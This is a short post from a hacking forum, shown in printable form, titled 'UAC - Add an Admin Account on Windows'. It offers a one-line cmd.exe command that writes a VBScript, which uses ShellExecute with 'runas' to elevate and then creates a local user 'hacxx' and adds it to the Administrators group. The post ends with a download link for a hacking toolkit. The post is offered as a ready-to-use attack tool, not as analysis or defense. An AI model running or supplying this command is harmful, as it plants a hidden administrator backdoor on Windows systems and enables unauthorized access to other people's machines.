![]() |
|
UAC - Add an Admin Account on Windows - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools) +---- Forum: Hacxx's Posts (https://sinister.ly/Forum-Hacxx-s-Posts) +---- Thread: UAC - Add an Admin Account on Windows (/Thread-UAC-Add-an-Admin-Account-on-Windows) |
UAC - Add an Admin Account on Windows - hacxx - 12-16-2022 Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs![]() Download: Hacxx Magician Toolkit Update 3 https://filecrypt.cc/Container/B94F04A70D.html |